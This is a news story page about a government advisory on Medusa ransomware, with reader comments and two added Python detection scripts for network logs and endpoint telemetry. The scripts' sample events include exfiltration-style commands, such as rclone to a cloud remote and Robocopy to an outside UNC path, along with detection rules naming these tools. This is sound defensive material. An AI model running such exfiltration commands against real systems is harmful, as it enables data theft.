Cybersecurity Alert Warns of 300 Attacks with 'Medusa' Ransomware (theregister.com)
A ransomware-as-a-service variant called "Medusa" has claimed over 300 victims in "critical infrastructure sectors" (including medical), according to a joint alert from CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC).
And that alert reminds us that Medusa is a globe-spanning operation that recruits third-party affiliates to plant ransomware and negotiate with victims, notes the Register. "Even organizations that have good ransomware recovery regimes, meaning they don't need to unscramble encrypted data as they have good backups and fall-back plans, may consider paying to prevent the release of their stolen data, given the unpleasant consequences that follow information leaks. Medusa actors also set a deadline for victims to pay ransoms and provide a countdown timer that makes it plain when stolen info will be sprayed across the internet. If victims cough up $10,000 in cryptocurrency, the crims push the deadline forward by 24 hours."
The advisory reveals one Medusa actor has taken things a step further. "FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid," the advisory states. That separate actor then "requested half of the payment be made again to provide the 'true decryptor'," the advisory states, describing this incident as "potentially indicating a triple extortion scheme."
The security groups' advisory stresses that they "do not encourage paying ransoms as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations..." (But "Regardless of whether you or your organization have decided to pay the ransom, FBI, CISA, and MS-ISAC urge you to promptly report ransomware incidents...")
Besides updating software and operating systems, the alert makes these recommendations for organizations:
- Require VPNs (or jump hosts) for remote network access
- Block remote access from unknown/untrusted origins, and disable unused ports
- Segment networks to help prevent the spread of ransomware
- Use a network monitoring tool to spot and investigate abnormal activity, including lateral movement (using endpoint detection and response tools). Log all network traffic, and monitor it for unauthorized scanning and access attempts.
- Create recovery plans with encrypted offline backups of sensitive/proprietary data and servers
- Require multifactor authentication, use strong (and long) passwords, and "consider not requiring frequently recurring password changes, as these can weaken security." (Also audit access control following the principle of least privilege, and watch for new and/or unrecognized accounts.)
- Disable command-line and scripting activities and permissions.
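Three of the recommendations above (block remote access from untrusted origins, segment the network, and monitor traffic for scanning and lateral movement) are things a detection engineer can check against connection logs. The script below is an added example written for this page, not code from the advisory, The Register, or any vendor tool. It runs over constructed connection records; the subnets, the list of trusted remote origins, the edge host, the admin-port table and the thresholds are all hypothetical and would be replaced with an organisation's own layout.

```python
"""Flag port scans, workstation-to-workstation admin-protocol traffic and
remote access from unlisted origins in simple connection logs.

Added example for the advisory's mitigation list; the log format, subnets,
allowlists and thresholds below are constructed for illustration.
"""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Hypothetical layout: workstations live in 10.10.0.0/16 and must never open
# admin sessions to other hosts; servers are managed from a jump host in
# 10.20.0.0/16 (outside the workstation range, so it is not flagged).
WORKSTATIONS = ip_network("10.10.0.0/16")
# The VPN / RDP gateway, and the only origins expected to reach it.
EDGE_HOSTS = {ip_address("192.0.2.10")}
TRUSTED_REMOTE_ORIGINS = [ip_network("203.0.113.0/24")]
ADMIN_PORTS = {445: "SMB", 3389: "RDP", 5985: "WinRM", 5986: "WinRM-TLS", 22: "SSH"}
SCAN_PORT_THRESHOLD = 10   # distinct ports on one host from one source
SCAN_HOST_THRESHOLD = 10   # distinct hosts on one port from one source

# Constructed records, one per line: "timestamp src_ip dst_ip dst_port".
SAMPLE_LOG = "\n".join(
    # an SMB sweep from one workstation across twelve neighbours
    [f"2025-03-12T01:00:{i:02d} 10.10.4.21 10.10.4.{20 + i} 445" for i in range(12)]
    # the same workstation probing twelve low ports on one server
    + [f"2025-03-12T01:01:{i:02d} 10.10.4.21 10.30.0.8 {port}" for i, port in enumerate(range(1, 13))]
    + [
        "2025-03-12T01:02:00 10.20.0.5 10.30.0.8 3389       # jump host to server: expected",
        "2025-03-12T01:03:00 198.51.100.77 192.0.2.10 3389  # RDP to the edge from an unlisted origin",
        "2025-03-12T01:04:00 203.0.113.9 192.0.2.10 443     # VPN from a trusted origin: expected",
    ]
)


def parse(lines):
    """Turn log lines into (timestamp, src, dst, port) tuples; '#' starts a comment."""
    records = []
    for line in lines:
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ts, src, dst, port = line.split()
        records.append((ts, ip_address(src), ip_address(dst), int(port)))
    return records


def detect_scans(records):
    """One source touching many ports on one host, or many hosts on one port."""
    ports_per_target = defaultdict(set)   # (src, dst)  -> ports seen
    hosts_per_port = defaultdict(set)     # (src, port) -> hosts seen
    for _, src, dst, port in records:
        ports_per_target[(src, dst)].add(port)
        hosts_per_port[(src, port)].add(dst)
    alerts = []
    for (src, dst), ports in ports_per_target.items():
        if len(ports) >= SCAN_PORT_THRESHOLD:
            alerts.append(("port_scan", str(src), str(dst), len(ports)))
    for (src, port), hosts in hosts_per_port.items():
        if len(hosts) >= SCAN_HOST_THRESHOLD:
            alerts.append(("host_sweep", str(src), port, len(hosts)))
    return alerts


def detect_lateral_admin(records):
    """Admin protocols initiated from the workstation range, grouped per source and protocol."""
    targets = defaultdict(set)  # (src, protocol) -> destinations
    for _, src, dst, port in records:
        if port in ADMIN_PORTS and src in WORKSTATIONS:
            targets[(src, ADMIN_PORTS[port])].add(dst)
    return [("lateral_admin", str(src), proto, len(dsts)) for (src, proto), dsts in targets.items()]


def detect_untrusted_remote(records):
    """Connections to the remote-access edge from origins outside the allowlist."""
    return [
        ("untrusted_remote_origin", str(src), str(dst), port)
        for _, src, dst, port in records
        if dst in EDGE_HOSTS and not any(src in net for net in TRUSTED_REMOTE_ORIGINS)
    ]


def analyse(log_text):
    """Run all three detectors over a log and return the combined alert list."""
    records = parse(log_text.splitlines())
    return detect_scans(records) + detect_lateral_admin(records) + detect_untrusted_remote(records)


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

On the constructed log this yields four alerts: a host sweep on port 445, a port scan against 10.30.0.8, one lateral_admin finding for the workstation that opened SMB to twelve hosts, and one untrusted origin reaching the edge over RDP. The jump host and the trusted VPN origin produce nothing, which is the point of keeping the allowlists explicit rather than alerting on every admin-port connection.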
Re: (Score:2)
MICROS~1 Windows strikes again ..
[babelphish] "Hey everyone! I have an unsubstantiated, FUD, point to grind like a fork in a garbage disposal! Look at me! I'm completely ignorant of system security but, boy!, do I feel like I'm contributing!" [babelphish]
Is this related to the Outlook attacks? (Score:2)
Parent vacuous and not constructive.
However, the story makes me wonder if it is related to a recent submission of mine that Slashdot didn't care for... There were actually two parts of it, but the bits that seem relevant to this story are the "abnormal activity" and "access attempts" that I commented on in that submission.
But let's start with the quiz to see if it's personally relevant to you. If you have a Microsoft account, then this applies to you. Even if you don't want that account... If you scrounge a
The solution to ransomware in 3 words... (Score:2)
End users (Score:2)
Those "recommendations" are primarily aimed at the mouth-breathing end users who will engage with pretty much any piece of digital garbage in the mistaken belief that they're awesome and fark personal responsibility
Until we're allowed to fire these chuckledinks, this state of affairs will persist.
Violence... (Score:2)
...may not always be the solution but some of these scammers could probably benefit from an epic ass whoopin.
Would love to see a video where these bastards get raided by the cops AND their mothers with belts/chanclas/paddles in hand.
Re: (Score:2)
We need to send a beekeeper after them.
Yes, politics here, sue me! (Score:1, Insightful)
DOGE probably fucked cybersecurity investigations team also.
Their solution is ban Linux? (Score:2)
Disable command-line and scripting activities and permissions.
Wait... What?
Re: (Score:2)
They target Windows machines. Makes sense to deactivate scripting on machines used by the corporate Excel drones.
Attack chains mounted by the ransomware syndicate involve the exploitation of known security flaws in public-facing applications, mainly Microsoft Exchange Server, to obtain initial access.
Once gaining a successful foothold, the hackers use remote management and monitoring (RMM) software such as SimpleHelp, AnyDesk, or MeshAgent for persistent access, and employ the tried-and-tested Bring Your Own Vulnerable Driver (BYOVD) technique to terminate antivirus processes using KillAV.
Some of the other tools deployed over the course of a Medusa ransomware attack include Navicat to access and run database queries, RoboCopy, and Rclone for data exfiltration.
https://thehackernews.com/2025... [thehackernews.com]
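The tooling listed in that comment (RMM agents for persistence, a vulnerable driver to kill AV, Navicat for database access, RoboCopy and Rclone for exfiltration) is all visible in endpoint process-creation and driver-load telemetry, so it is worth showing what a hunt over that telemetry looks like. The block below is an added example written for this page, not code from the advisory, The Hacker News, or any EDR product. The field names mirror what Sysmon-style logging exposes (image path, command line, user, host), but every event, host name, user, the sanctioned-RMM allowlist and the DBA-host list are constructed. The driver rule deliberately ignores the signature flag: a BYOVD driver is legitimately signed, so load path is the better signal.

```python
"""Hunt endpoint telemetry for the tooling described in the comment above:
unsanctioned RMM agents, Rclone/RoboCopy pointed at remote targets, a database
client on a non-DBA host, and a driver loaded from a user-writable directory.

Added example; the events, hosts, users and allowlists are constructed.
"""
import re
from pathlib import PureWindowsPath

RMM_NAMES = ("anydesk", "meshagent", "simplehelp")
SANCTIONED_RMM = {"HELPDESK-01": {"anydesk"}}     # hypothetical allowlist: host -> agents permitted there
DBA_HOSTS = {"DBA-01"}                             # hypothetical hosts where a DB client is expected
DRIVER_DIR = PureWindowsPath(r"C:\Windows\System32\drivers")
UNC_RE = re.compile(r"\\\\[^\s\\]+\\")             # \\host\share style destination
# rclone remotes look like "name:path"; a single letter plus ":\" is a drive, not a remote
RCLONE_REMOTE_RE = re.compile(r"(?<![\w\\:])[A-Za-z][\w-]+:(?!\\)")

# Constructed events. "signed" is carried on driver loads only to show the rule does not depend on it.
SAMPLE_EVENTS = [
    {"type": "process", "host": "WS-FIN-07", "user": "CORP\\jsmith",
     "image": r"C:\Users\jsmith\AppData\Local\Temp\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"type": "process", "host": "HELPDESK-01", "user": "CORP\\helpdesk",
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe"},
    {"type": "process", "host": "SQL-02", "user": "CORP\\svc_backup",
     "image": r"C:\Users\svc_backup\rclone.exe", "cmdline": r"rclone.exe copy D:\Exports mega:dump --transfers 16"},
    {"type": "process", "host": "FS-01", "user": "CORP\\jsmith",
     "image": r"C:\Windows\System32\Robocopy.exe", "cmdline": r"Robocopy.exe E:\Shares \\198.51.100.77\drop /E"},
    {"type": "process", "host": "FS-01", "user": "CORP\\backupsvc",
     "image": r"C:\Windows\System32\Robocopy.exe", "cmdline": r"Robocopy.exe E:\Shares F:\Backup /MIR"},
    {"type": "driverload", "host": "WS-FIN-07", "signed": True,
     "image": r"C:\Users\jsmith\AppData\Local\Temp\drv.sys"},
    {"type": "driverload", "host": "WS-FIN-07", "signed": True,
     "image": r"C:\Windows\System32\drivers\tcpip.sys"},
    {"type": "process", "host": "WS-FIN-07", "user": "CORP\\jsmith",
     "image": r"C:\Tools\navicat.exe", "cmdline": "navicat.exe"},
]


def hunt(events):
    """Return (rule, host, detail) findings for every event that matches a rule."""
    findings = []
    for ev in events:
        host = ev["host"]
        path = PureWindowsPath(ev["image"])
        name = path.name.lower()

        if ev["type"] == "driverload":
            # BYOVD drivers are validly signed, so key on where the file lives instead.
            if path.parent != DRIVER_DIR:
                findings.append(("driver_outside_system_dir", host, str(path)))
            continue

        cmd = ev["cmdline"]
        rmm = next((n for n in RMM_NAMES if n in name), None)
        if rmm and rmm not in SANCTIONED_RMM.get(host, set()):
            findings.append(("unsanctioned_rmm", host, f"{rmm} run by {ev['user']}"))
        if name == "rclone.exe" and RCLONE_REMOTE_RE.search(cmd):
            findings.append(("rclone_to_remote", host, cmd))
        if name == "robocopy.exe" and UNC_RE.search(cmd):
            findings.append(("robocopy_to_unc", host, cmd))
        if "navicat" in name and host not in DBA_HOSTS:
            findings.append(("db_client_on_non_dba_host", host, ev["user"]))
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The two RoboCopy events show why the destination matters: the same binary copying a share to a local backup drive is routine, while the same command aimed at a UNC path on an address nobody recognises is the exfiltration pattern the comment describes. The sanctioned AnyDesk on the help-desk host is likewise left alone, since the advisory's "watch for unrecognized" advice only works if the recognised set is written down somewhere the detection can read it.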
Re: (Score:2)
Mod parent up and I am also interested in doing this...